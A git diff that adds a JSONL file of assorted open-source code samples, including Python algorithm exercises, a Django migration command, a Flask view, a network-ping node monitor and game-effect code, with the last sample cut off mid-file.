diff --git "a/2940.jsonl" "b/2940.jsonl" new file mode 100644--- /dev/null +++ "b/2940.jsonl" @@ -0,0 +1,584 @@ +{"seq_id":"391653692","text":"from collections import deque\nimport sys\nsys.stdin=open(\"00.txt\")\n\nMAX = 200000\ncheck = [False] *(MAX+1)\ndist = [-1] * (MAX+1)\nn,m = map(int,input().split())\ncheck[n] = True\ndist[n] = 0\n\nq= deque()\nq.append(n)\n\nwhile q:\n now = q.popleft()\n for nxt in [now-1,now+1,now*2]:\n if 0<= nxt <= MAX and check[nxt] == False:\n check[nxt] = True\n dist[nxt] = dist[now] +1\n q.append(nxt)\n\nprint(dist[m])\n","sub_path":"BFS/1/1697번 - 숨바꼭질/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"574886207","text":"import math\n\n\nh = 0.01\nN = 1000\n\ndef y(y1, y0=1):\n yhead = [y0, y1]\n for i in range(N):\n yhead.append(yhead[-2] + 2*h*(-2*yhead[-1] + 1))\n return yhead\n\n\nyf = list(enumerate(y((1-2*h+math.sqrt(4*(h**2)+1))/2)))\nys = list(enumerate(y((math.exp(-2*h)+1)/2)))\nprint(\"With y1 =(1-2h+sqrt(4h^2+1))/2 : \" + str(yf))\nprint(\"With y1 =(exp(-2*h)+1)/2 : \" + str(ys))\n","sub_path":"10.8.8.Kulyashov.py","file_name":"10.8.8.Kulyashov.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"19212937","text":"from SinglyLinkedList import SinglyLinkedList\n\nclass Queue(object):\n \"\"\"docstring for Queue\"\"\"\n lstInstance = SinglyLinkedList()\n def dequeue(self):\n return self.lstInstance.removeAt(0)\n def enqueue(self, value):\n self.lstInstance.insertAt(value, self.lstInstance.getSize())\n \nif __name__ == '__main__':\n queue = Queue()\n queue.enqueue('a')\n queue.enqueue('b')\n queue.enqueue('c')\n\n print(queue.dequeue())\n print(queue.dequeue())\n print(queue.dequeue())\n","sub_path":"Queue.py","file_name":"Queue.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"578883234","text":"import os\n\nclass Node:\n\n def __init__(self, name: str, typenode: str, coord: list, addr: list, status: str, desc=None):\n self.stat = [\"down\", \"down\", \"down\"]\n self.name = name\n self.type = typenode\n self.coord = coord\n self.addr = addr\n self.status = status\n self.desc = desc\n\n def ping(self, ip):\n ping = f\"ping -c 3 {ip} > /dev/null\"\n return os.system(ping)\n\n def stats(self):\n self.stat = []\n for ip in self.addr:\n if self.ping(ip) == 0:\n self.stat.append(\"up\")\n else:\n self.stat.append(\"down\")\n\n def check_status(self):\n if \"down\" in self.stat:\n self.status = \"offline\"\n else:\n self.status = \"online\"\n\n\n\n def take_screenshot(self):\n if self.type == \"cam\":\n pass\n\n\n\n\n\nvk01 = Node(\"vk01\", \"cam\", ['43.581482', '39.722635'], ['31.173.192.49', '10.10.20.101', '172.30.100.254'], \"online\")\n\n\n","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"106094821","text":"import datetime\nimport re\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.sites import models as sites_models\n\nfrom armstrong.apps.articles import models as article_models\nfrom armstrong.core.arm_sections import models as section_models\nfrom armstrong.core.arm_wells import models as well_models\n\n# Need to convert:\n#\n# 1. Sections\n# 2. News\n# 3. 
Users\nfrom madisonian import models as mad_models\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n self.slug_ctr = 0\n self.clear_tables()\n self.convert_sections()\n self.convert_articles()\n self.add_well()\n\n def convert_sections(self):\n for section in mad_models.Sections.objects.all().order_by('priority'):\n slug = self.slugify(section.section)\n section_models.Section.objects.create(title=section.section, slug=slug)\n\n def convert_articles(self):\n for news in mad_models.News.objects.filter(issue_date__gt=datetime.date(2011,12,31)):\n slug = re.sub(r\"\\W\", \"\", news.caption.lower())\n if not slug:\n slug = self.junk_slug()\n try:\n article_models.Article.objects.get(slug=slug)\n slug = self.junk_slug()\n except article_models.Article.DoesNotExist:\n pass\n pub_date = datetime.datetime.strptime(\"%s 00:00:00\" % news.issue_date, \"%Y-%m-%d %H:%M:%S\")\n article = article_models.Article(title=news.caption,\n slug=slug[:50],\n summary=news.preview,\n body=news.full_story,\n pub_date=pub_date,\n pub_status='P',)\n article.save()\n article.sites.add(sites_models.Site.objects.all()[0])\n article.sections.add(section_models.Section.objects.get(full_slug=self.slugify(news.section)))\n article.save()\n\n\n def clear_tables(self):\n self.clear_sites()\n self.clear_sections()\n self.clear_articles()\n\n def clear_sites(self):\n site = sites_models.Site.objects.all()[0]\n site.domain='wintersetmadisonian.com'\n site.name='wintersetmadisonian.com'\n site.save()\n\n def clear_sections(self):\n section_models.Section.objects.all().delete()\n\n def clear_articles(self):\n article_models.Article.objects.all().delete()\n\n def slugify(self, words):\n return re.sub(r\"\\W\", \"\", words.lower())\n\n def junk_slug(self):\n self.slug_ctr += 1\n return str(self.slug_ctr)\n\n def add_well(self):\n type = well_models.WellType.objects.create(title='front_page', slug='front_page')\n well_models.Well.objects.create(pub_date=datetime.datetime.now(), type=type)","sub_path":"project/madisonian/management/commands/convert_madisonian.py","file_name":"convert_madisonian.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"230264108","text":"#!/bin/python3\n\nimport json\nimport logging\nimport os\nimport sys\nimport time\nimport copy\nimport random\nfrom logging.handlers import RotatingFileHandler\n\nfrom alexis_src.client_player import ClientPlayer\nfrom alexis_src.get_all_possible_plays import get_all_possible_plays\nfrom alexis_src.immutable_play import immutable_play\nfrom alexis_src.evaluate_game_state import predict_carlotta_move_inspector\n\nDEFAULT_HOST = \"localhost\"\nDEFAULT_PORT = 12000\n# HEADERSIZE = 10\n\n\"\"\"\nset up inspector logging\n\"\"\"\n# inspector_logger = logging.getLogger()\n# inspector_logger.setLevel(logging.DEBUG)\n# formatter = logging.Formatter(\n# \"%(asctime)s :: %(levelname)s :: %(message)s\", \"%H:%M:%S\")\n# # file\n# if os.path.exists(\"./logs/inspector.log\"):\n# os.remove(\"./logs/inspector.log\")\n# file_handler = RotatingFileHandler('./logs/inspector.log', 'a', 1000000, 1)\n# file_handler.setLevel(logging.DEBUG)\n# file_handler.setFormatter(formatter)\n# inspector_logger.addHandler(file_handler)\n# # stream\n# stream_handler = logging.StreamHandler()\n# stream_handler.setLevel(logging.WARNING)\n# inspector_logger.addHandler(stream_handler)\n\n\ndef get_best_play(game_state, plays):\n best_play = None\n min_carlotta_move = None\n best_game_state = 
None\n\n for play in plays:\n new_game_state = immutable_play(game_state, play)\n (scream, no_scream) = predict_carlotta_move_inspector(new_game_state)\n new_min_carlotta_move = abs(scream - no_scream)\n\n if best_play == None or new_min_carlotta_move < min_carlotta_move:\n best_play = play\n min_carlotta_move = new_min_carlotta_move\n best_game_state = new_game_state\n\n return (best_play, min_carlotta_move, best_game_state)\n\n\ndef immutable_play_rec2(question):\n plays = get_all_possible_plays(question)\n\n best_play = None\n min_carlotta_move = None\n for play in plays:\n new_game_state = immutable_play(question[\"game state\"], play)\n\n new_data = copy.deepcopy(question[\"data\"])\n new_data.pop(play[0])\n new_question = {\n \"question type\": question[\"question type\"],\n \"data\": new_data,\n \"game state\": new_game_state\n }\n\n plays2 = get_all_possible_plays(new_question)\n\n for play2 in plays2:\n new_game_state2 = immutable_play(new_game_state, play2)\n (scream, no_scream) = predict_carlotta_move_inspector(new_game_state2)\n new_min_carlotta_move = abs(scream - no_scream)\n\n if best_play == None or new_min_carlotta_move < min_carlotta_move:\n best_play = play + play2\n min_carlotta_move = new_min_carlotta_move\n\n return best_play\n\n\nclass SimpleMaxAI:\n def __init__(self):\n self.response_stack = []\n\n def get_next_play(self, question):\n if self.response_stack == []:\n if (question[\"game state\"][\"num_tour\"] - 1) % 2 == 1:\n self.response_stack = immutable_play_rec2(question)\n else:\n plays = get_all_possible_plays(question)\n (best_play, _, _) = get_best_play(question[\"game state\"], plays)\n\n self.response_stack = best_play\n\n if question[\"question type\"] == \"select character\":\n return self.response_stack.pop(0)\n else:\n return question[\"data\"].index(self.response_stack.pop(0))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n seed = float(sys.argv[1])\n else:\n seed = time.time()\n random.seed(seed)\n\n ai = SimpleMaxAI()\n p = ClientPlayer(DEFAULT_HOST, DEFAULT_PORT, ai)\n p.run()\n","sub_path":"alexis_inspector.py","file_name":"alexis_inspector.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"397610297","text":"def greedy_cow_transport(cows,limit):\n \"\"\"\n Uses a greedy heuristic to determine an allocation of cows that attempts to\n minimize the number of spaceship trips needed to transport all the cows. The\n returned allocation of cows may or may not be optimal.\n The greedy heuristic should follow the following method:\n\n 1. As long as the current trip can fit another cow, add the largest cow that will fit\n to the trip\n 2. 
Once the trip is full, begin a new trip to transport the remaining cows\n\n Does not mutate the given dictionary of cows.\n\n Parameters:\n cows - a dictionary of name (string), weight (int) pairs\n limit - weight limit of the spaceship (an int)\n \n Returns:\n A list of lists, with each inner list containing the names of cows\n transported on a particular trip and the overall list containing all the\n trips\n \"\"\"\n \n cowDict = cows\n sortedCowList = sorted(cowDict, key=cowDict.get, reverse=True)\n \n result = []\n \n while sortedCowList != []:\n trip = []\n tripCost = 0\n \n for cow in sortedCowList:\n if cowDict[cow] + tripCost <= limit:\n tripCost += cowDict[cow]\n trip.append(cow)\n \n result.append(trip)\n \n for cow in trip:\n sortedCowList.remove(cow) \n \n return result\n","sub_path":"Problem1/greedyCowTransport.py","file_name":"greedyCowTransport.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"332914945","text":"from sqlalchemy.sql.expression import func\nfrom flask import (Blueprint, flash, g, redirect, render_template, request, session, url_for)\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom base import db, Usuario\nfrom flask import session\nfrom base import *\nimport time\nimport datetime\n\nurlBuscarXEtiqueta = Blueprint('ControladorBuscarXEtiqueta', __name__, url_prefix='/ControladorBuscarXEtiqueta')\n\n@urlBuscarXEtiqueta.route('/buscar_etiqueta', methods=('GET', 'POST'))\ndef buscar_etiqueta():\n if request.method == 'POST':\n etiqueta = request.form['etiquetabuscar']\n user = session[\"user\"]\n recursosEnEtiqueta = []\n error = None\n if not etiqueta:\n error = 'Inserte etiqueta'\n if error is None:\n if db.session.query(Etiqueta.query.filter(Etiqueta.nombre == etiqueta).exists()).scalar():\n usuario = db.session.query(Usuario).filter(Usuario.username == user).one()\n etiqueta1 = db.session.query(Etiqueta).filter(Etiqueta.nombre == etiqueta).one()\n\n for categoria in usuario.categorias:\n for recurso in categoria.recursos:\n for etiqueta in recurso.recurso.etiquetas:\n if etiqueta.etiqueta.id_etiqueta == etiqueta1.id_etiqueta:\n recursosEnEtiqueta.append(recurso.recurso.recurso)\n return render_template('buscar_por_etiqueta.html', recursosBuscados=recursosEnEtiqueta)\n flash (error)\n return render_template ('buscar_por_etiqueta.html')\n\n\n","sub_path":"Project/Server/Server/flaskr/ControladorBuscarXEtiqueta.py","file_name":"ControladorBuscarXEtiqueta.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"446890832","text":"\"\"\"\r\nlinked list\r\n\"\"\"\r\nimport random\r\n\r\n\r\nclass Node:\r\n \"\"\"\r\n node class\r\n \"\"\"\r\n def __init__(self, val):\r\n self.val = val\r\n self.next = None\r\n\r\n def __str__(self):\r\n return str(self.val)\r\n\r\n def is_none(self):\r\n \"\"\"return True if .next is none\"\"\"\r\n return self.next is None\r\n\r\n\r\nclass LinkedList:\r\n \"\"\"\r\n Linked List\r\n \"\"\"\r\n @staticmethod\r\n def create_random_int_list(length=10):\r\n \"\"\"\r\n create a singly linked list with random integers\r\n \"\"\"\r\n nums = random.sample(range(0, length), length)\r\n print(nums)\r\n head = Node(nums[0])\r\n curr = head\r\n for num in nums[1:]:\r\n curr.next = Node(num)\r\n curr = curr.next\r\n return head\r\n\r\n @staticmethod\r\n def print_linkedlist(head):\r\n 
\"\"\"\r\n print each element of linked list (without loop detection)\r\n \"\"\"\r\n curr = head\r\n while curr is not None:\r\n print(curr.val, end=\" \")\r\n if curr.next is None:\r\n # print('here')\r\n break\r\n else:\r\n curr = curr.next\r\n print(\"\")\r\n\r\n\r\ndef main():\r\n \"\"\"main\"\"\"\r\n head = LinkedList.create_random_int_list(10)\r\n LinkedList.print_linkedlist(head)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"linked_list_loop_detection/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"304289578","text":"import random\nfrom pyglet import clock\nfrom lostcolony.pathfinding import HexGrid, HEX_HEIGHT, HEX_WIDTH\nfrom lostcolony.animation import load\n\n\nclass Effect:\n FILENAMES = ['effects/ricochet-%d.png' % i for i in range(1, 5)]\n\n images = None\n\n @classmethod\n def load_images(cls):\n if cls.images is not None:\n return\n\n cls.images = []\n for fname in cls.FILENAMES:\n im = load(fname)\n im.anchor_x = im.width // 2\n im.anchor_y = im.height\n cls.images.append(im)\n\n def __init__(self, world, pos):\n self.load_images()\n self.world = world\n self.pos = pos\n self.world.add_effect(self, pos)\n\n\nclass Ricochet(Effect):\n \"\"\"This is the ricochet effect for the autocannon.\"\"\"\n\n def __init__(self, world, pos, duration=0.5):\n super().__init__(world, pos)\n if duration is not None:\n clock.schedule_once(self.destroy, duration)\n\n def random_sprites(self, num=1):\n x, y = HexGrid.coord_to_world(self.pos)\n for _ in range(num):\n im = random.choice(self.images)\n dx = random.random() - 0.5\n dy = random.random() - 0.5\n c = x + dx, y + dy\n yield c, im\n\n def get_drawables(self):\n return self.random_sprites()\n\n def destroy(self, _):\n self.world.remove_effect(self, self.pos)\n\n\nclass ShotgunRicochet(Ricochet):\n def __init__(self, world, pos):\n super().__init__(world, pos, duration=0.3)\n self.drawables = list(self.random_sprites(5))\n\n def get_drawables(self):\n return self.drawables\n\n\nclass FlyingSprite(tuple):\n def blit(self, x, y, _):\n img, z = self\n img.blit(x, y + z, 0)\n\n\nclass BloodSpray(Effect):\n POINTS = [10, 5, 3, 2, 1]\n FILENAMES = ['effects/blood-%d.png' % p for p in POINTS]\n V = 2\n\n def __init__(self, world, pos, value, max_value=10):\n super().__init__(world, pos)\n self.create_particles(value, max_value)\n clock.schedule(self.update)\n\n def create_particles(self, value, max_value):\n self.particles = []\n for points, img in zip(self.POINTS, self.images):\n if points > max_value:\n continue\n num, value = divmod(value, points)\n\n x, y = HexGrid.coord_to_world(self.pos)\n for _ in range(num):\n v = self.V\n vx = random.uniform(-v, v)\n vy = random.uniform(-v, v)\n z = 30\n vz = random.uniform(60, 100)\n self.particles.append((x + vx * 0.5, y + vy * 0.5, z, vx, vy, vz, img))\n if not value:\n break\n\n def update(self, dt):\n ps = []\n for x, y, z, vx, vy, vz, img in self.particles:\n uz = vz\n vz -= 200 * dt\n z += 0.5 * (uz + vz) * dt\n if z < 0:\n continue\n x += vx * dt\n y += vy * dt\n ps.append((x, y, z, vx, vy, vz, img))\n self.particles = ps\n\n def get_drawables(self):\n for x, y, z, *_, img in self.particles:\n yield (x, y), FlyingSprite((img, z))\n","sub_path":"lostcolony/effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} 
+{"seq_id":"42819692","text":"lst=[]\n\nn=int(input(\"Enter the size of the list :\"))\nprint(\"Enter the elemnts:\")\nfor i in range (0,n):\n ele=input()\n lst.append(ele)\nm= lst[n-1] \nlst[n-1] = -1\nfor i in range(n-2,-1,-1): \n temp = lst[i] \n lst[i]=m \n if m< temp: \n m=temp\nprint(\"The modified list is\",lst) \n \n","sub_path":"day_5/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"538850136","text":"def fibonacci(n):\n response = [0, 1, 1]\n if n == 0:\n return []\n elif n in [1, 2, 3]:\n return response[:n]\n else:\n for i in range(4, n + 1):\n response.append(response[i - 3] + response[i - 2])\n return response\n\n\nif __name__ == \"__main__\":\n print(list(map(lambda x: x**3, fibonacci(int(input())))))\n","sub_path":"pythonChallenges/easy/MapAndLambdaFunction.py","file_name":"MapAndLambdaFunction.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"413729661","text":"# -*- coding: utf8 -*-\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.forms import SelectMultiple\nfrom django.forms.fields import MultipleChoiceField\nfrom datetime import datetime\n\nfrom TripleMag.apps.member.models import user_basic\n\n##################################################################\n#Stock trade \n##################################################################\n\nclass selling_poll(models.Model):\n user_from = models.ForeignKey(user_basic,related_name=\"usr_from\",null=False,verbose_name='卖出者用户ID')\n amount = models.IntegerField(null=False,verbose_name='卖出数量')\n value = models.DecimalField(max_digits=10,decimal_places=4,null=False,verbose_name='单价')\n time = models.DateTimeField(null=False,blank=True,auto_now=True,verbose_name='进入卖出池时间')\n user_to = models.ForeignKey(user_basic,related_name=\"usr_to\",null=True,verbose_name='定向卖给用户ID')\n #if user_to is null, then it's selled to everybody.\n #or only the user_to can see the selling\n #in the meanwhile the P2P selling have different setting of data\n #\n class Meta:\n verbose_name_plural =\"卖出池表\"\n\n##################################################################\n#Stock records \n##################################################################\n\nclass trade_record(models.Model):\n buyer = models.ForeignKey(user_basic,related_name=\"usr_buyer\",null=False,verbose_name='买股者ID')\n seller = models.ForeignKey(user_basic,related_name=\"usr_seller\",null=False,verbose_name='卖股者ID')\n amount = models.IntegerField(null=False,verbose_name='交易数量')\n value = models.DecimalField(max_digits=10,decimal_places=4,null=False,verbose_name='单价')\n time = models.DateTimeField(null=False,blank=True,auto_now=True,verbose_name='成交时间')\n #What's following is info. 
for sellers\n tax = models.DecimalField(max_digits=10,decimal_places=2,null=False,verbose_name='抽税')\n repo = models.DecimalField(max_digits=10,decimal_places=2,null=False,verbose_name='回购')\n #Repo is the money that returns to his rebuy account to encourage him to buy more stock.\n ex_return = models.DecimalField(max_digits=10,decimal_places=2,null=False,verbose_name='返给上级')\n #Return to the seller's recommender\n gain = models.DecimalField(max_digits=10,decimal_places=2,null=False,verbose_name='卖者最后所得')\n class Meta:\n verbose_name_plural =\"股票交易记录表\"\n\n\n\n#class flowing_stock(models.Model):\n# amont = models.BigIntegerField(null=False)\n# def __unicode__(self):\n# return self.name\n# class Meta:\n# verbose_name_plural =\"系统总股数\"\n\nEnumIncomeType= (\n (\"recharge\",\"自购充值\"),\n (\"gift\",\"商城购买赠送\"),\n (\"buy\",\"股票交易购买\"),\n)\nclass income_record(models.Model):\n to_user = models.ForeignKey(user_basic,related_name=\"usr_income\",null=True,verbose_name='得到股票用户ID')\n type = models.CharField(max_length=10,null=False,choices=EnumIncomeType,verbose_name='股票得到途径')\n amount = models.DecimalField(max_digits=10,decimal_places=4,null=False,blank=False,verbose_name='股票数额')\n time = models.DateTimeField(null=False,blank=True,auto_now=True,verbose_name='股票到达时间')\n class Meta:\n verbose_name_plural =\"股票收入表\"\n\nclass trend_record(models.Model):\n value = models.DecimalField(max_digits=10,decimal_places=4,null=False,default=1.00,verbose_name='股票单价')\n day = models.DateTimeField(null=False,blank=True,auto_now=True,verbose_name='日期')\n class Meta:\n verbose_name_plural =\"趋势图表\"\n","sub_path":"TripleMag/apps/stock/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"146499373","text":"# coding=utf-8\n# Copyright 2019 The Edward2 Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for Keras-style initializers.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport edward2 as ed\nimport numpy as np\nimport tensorflow.compat.v1 as tf1\nimport tensorflow.compat.v2 as tf\n\nfrom tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import\n\n\n@test_util.run_all_in_graph_and_eager_modes\nclass InitializersTest(tf.test.TestCase):\n\n def testTrainableDeterministic(self):\n tf.random.set_seed(345689)\n shape = (100,)\n initializer = ed.initializers.get('trainable_deterministic')\n rv = initializer(shape)\n self.evaluate(tf1.global_variables_initializer())\n # Get distribution of rv -> get distribution of Independent.\n loc_value = self.evaluate(rv.distribution.distribution.loc)\n atol = np.sqrt(6/sum(shape)) + 1e-8\n self.assertAllClose(loc_value, np.zeros(shape), atol=atol)\n\n rv_value = self.evaluate(rv)\n self.assertEqual(rv_value.shape, shape)\n\n def testTrainableHalfCauchy(self):\n tf.random.set_seed(2832)\n shape = (3,)\n initializer = 
ed.initializers.get('trainable_half_cauchy')\n half_cauchy = initializer(shape)\n self.evaluate(tf1.global_variables_initializer())\n loc_value, scale_value = self.evaluate([\n # Get distribution of rv -> get distribution of Independent.\n half_cauchy.distribution.distribution.loc,\n half_cauchy.distribution.distribution.scale])\n self.assertAllClose(loc_value, np.zeros(shape), atol=1e-4)\n target_scale = np.log(1. + np.exp(-3.))\n self.assertAllClose(scale_value, target_scale * np.ones(shape), atol=5e-2)\n\n half_cauchy_value = self.evaluate(half_cauchy)\n self.assertAllEqual(half_cauchy_value.shape, shape)\n self.assertAllGreaterEqual(half_cauchy_value, 0.)\n\n def testTrainableNormal(self):\n tf.random.set_seed(345689)\n shape = (100,)\n initializer = ed.initializers.get('trainable_normal')\n normal = initializer(shape)\n self.evaluate(tf1.global_variables_initializer())\n loc_value, scale_value = self.evaluate([\n # Get distribution of rv -> get distribution of Independent.\n normal.distribution.distribution.loc,\n normal.distribution.distribution.scale])\n self.assertAllClose(loc_value, np.zeros(shape), atol=1e-4)\n target_scale = np.log(1. + np.exp(-3.))\n self.assertAllClose(scale_value, target_scale * np.ones(shape), atol=5e-2)\n\n normal_value = self.evaluate(normal)\n self.assertEqual(normal_value.shape, shape)\n\n def testTrainableMixtureOfDeltas(self):\n tf.random.set_seed(345689)\n shape = (100,)\n num_components = 5\n initializer = ed.initializers.TrainableMixtureOfDeltas(num_components)\n mixture_shape = list(shape) + [num_components]\n rv = initializer(shape)\n self.evaluate(tf1.global_variables_initializer())\n probs_value, loc_value = self.evaluate([\n # Get distribution of rv -> get distribution of Independent.\n rv.distribution.distribution.mixture_distribution.probs,\n rv.distribution.distribution.components_distribution.loc,\n ])\n self.assertAllClose(\n probs_value,\n tf.broadcast_to([[1/num_components]*num_components], mixture_shape),\n atol=1e-4)\n self.assertAllClose(loc_value, np.zeros(mixture_shape), atol=1.)\n\n value = self.evaluate(rv)\n self.assertEqual(value.shape, shape)\n\n def testInitializersGet(self):\n self.assertIsInstance(ed.initializers.get('trainable_normal'),\n ed.initializers.TrainableNormal)\n # This is working correctly, but the test won't pass currently because TF\n # isn't consistent (yet). 
Specifically, tf.keras.initializers.get('zeros')\n # returns a certain class while tf.keras.initializers.zeros (or Zeros)\n # currently returns v2 of that class.\n # self.assertIsInstance(ed.initializers.get('zeros'),\n # tf.keras.initializers.Zeros().__class__)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"edward2/tensorflow/initializers_test.py","file_name":"initializers_test.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"646796066","text":"# https://leetcode.com/problems/sliding-window-median/description/\r\n\r\n\"\"\"\r\n[1,3,-1,-3,5,3,6,7]\r\n3\r\n[1,1,1,1]\r\n2\r\n[1,2,3,4,2,3,1,4,2]\r\n3\r\n[9,7,0,3,9,8,6,5,7,6]\r\n2\r\n\"\"\"\r\nimport heapq # Attempt1\r\nfrom collections import defaultdict\r\n\r\nimport bisect # Solution1\r\nimport itertools as it \r\n\r\nfrom heapq import heappush, heappop # Solution 2\r\n\r\nclass Solution(object): \r\n \r\n def medianSlidingWindow(self, nums, k):\r\n return self.attempt1(nums, k) # Getting too unwieldy, keep for reference but don't use\r\n # return self.solution1(nums, k) # 149 ms -> 94.49% (used binary search instead of remove())\r\n # return self.solution2(nums, k) # 286 ms -> 79.53%\r\n \r\n def attempt1(self, nums, k):\r\n \"\"\"\r\n Correctly implemented by Solutions 2/3. Improvements compared to mine:\r\n (1) no self.window; just keep track of the new number and the number that'll be deleted.\r\n (2) don't need to keep track of min_size and max_size (which always sum to k), just the overall \"balance\" \r\n (3) handle invalid tops (nums[i-k]) immediately, so you don't have to check before balancing (have to check subsequent top)\r\n ^ This is probably the error in my code\r\n \"\"\"\r\n res = [] \r\n self.hmin = [] # bigger half of window\r\n self.hmax = [] # smaller half of window\r\n self.window = defaultdict(int) # do not need {i: num}, since we can tell where a number is on the heap\r\n self.need_to_delete = defaultdict(int) \r\n self.min_size = self.max_size = 0 # stores true size of heap\r\n for i in xrange(k):\r\n self.add_num(nums[i])\r\n res.append(self.get_median())\r\n for i in xrange(k, len(nums)): \r\n if nums[i] not in self.window:\r\n self.delete_num(nums[i-k]) # nums[i-k] just went out of the window \r\n self.add_num(nums[i]) \r\n res.append(self.get_median())\r\n return res\r\n \r\n def delete_num(self, num):\r\n \"\"\"Problem: What if num is in both hmin and hmax? Then it must be on top of both, and we arbitrarily invalidate one for hmin.\"\"\"\r\n self.window[num] -= 1\r\n self.need_to_delete[num] += 1\r\n if self.hmin and num >= self.hmin[0]: # the num is on the min_heap\r\n self.min_size -= 1\r\n else:\r\n self.max_size -= 1\r\n # Used to do top validation in get_median, but need to make sure everything is balanced afterward, which relies on add_num\r\n top1 = self.hmin[0] if self.hmin else None \r\n while self.need_to_delete[top1]:\r\n heapq.heappop(self.hmin)\r\n self.need_to_delete[top1] -= 1\r\n top1 = self.hmin[0] if self.hmin else None \r\n top2 = -self.hmax[0] if self.hmax else None\r\n while self.need_to_delete[top2]:\r\n heapq.heappop(self.hmax)\r\n self.need_to_delete[top2] -= 1\r\n top2 = -self.hmax[0] if self.hmax else None\r\n \r\n def add_num(self, num): \r\n \"\"\"Since there's one delete for every add, abs(max_size - min_size) <= 2\r\n Issue: e.g. 
one 3 is in window, but multiple 3's stored in heap, then only 1 should be valid.\"\"\"\r\n self.window[num] += 1 \r\n if not self.hmin or num > self.hmin[0]: # no need for hmax clause, will be balanced later\r\n heapq.heappush(self.hmin, num)\r\n self.min_size += 1\r\n else: \r\n heapq.heappush(self.hmax, -num)\r\n self.max_size += 1\r\n while self.min_size - self.max_size > 1:\r\n temp = heapq.heappop(self.hmin)\r\n if self.need_to_delete[temp]: # temp could also be in self.window, technically (see issue above)\r\n self.need_to_delete[temp] -= 1\r\n elif self.window[temp]: \r\n heapq.heappush(self.hmax, -temp)\r\n self.max_size += 1\r\n self.min_size -= 1 \r\n while self.max_size - self.min_size > 1:\r\n temp = -heapq.heappop(self.hmax)\r\n if self.need_to_delete[temp]:\r\n self.need_to_delete[temp] -= 1\r\n elif self.window[temp]:\r\n heapq.heappush(self.hmin, temp)\r\n self.min_size += 1\r\n self.max_size -= 1 \r\n \r\n def get_median(self): # We can assume that k <= len(arr); delete_num -> valid tops, add_num -> balanced heaps\r\n # print [-i for i in reversed(self.hmax)], self.hmin\r\n # print self.max_size, self.min_size\r\n if self.min_size == self.max_size:\r\n return (self.hmin[0] - self.hmax[0]) / 2.0\r\n elif self.min_size > self.max_size:\r\n return self.hmin[0]\r\n else:\r\n return -self.hmax[0]\r\n \r\n # Similar to: https://discuss.leetcode.com/topic/74634/easy-python-o-nk\r\n # C++: https://discuss.leetcode.com/topic/74963/o-n-log-k-c-using-multiset-and-updating-middle-iterator\r\n def solution1(self, nums, k): # maintain sorted sliding window\r\n window = sorted(nums[:k])\r\n is_odd = k&1\r\n mid = k/2\r\n medians = []\r\n medians.append(float(window[mid]) if is_odd else (window[mid-1] + window[mid])/2.0)\r\n for i in xrange(k, len(nums)):\r\n del window[bisect.bisect_left(window, nums[i-k])] # Used to be 428 ms -> 59.06% w/ remove()\r\n bisect.insort(window, nums[i])\r\n medians.append(float(window[mid]) if is_odd else (window[mid-1] + window[mid])/2.0)\r\n return medians \r\n \r\n def solution2(self, nums, k): # Based off: https://discuss.leetcode.com/topic/74634/easy-python-o-nk/9\r\n medians = []\r\n hashes = defaultdict(int)\r\n bheap, theap = [], []\r\n for i in xrange(k):\r\n heappush(bheap, nums[i])\r\n for _ in xrange(k/2, 0, -1):\r\n heappush(theap, -heappop(bheap))\r\n medians.append(float(bheap[0]) if k&1 else (bheap[0] - theap[0]) / 2.0) \r\n for 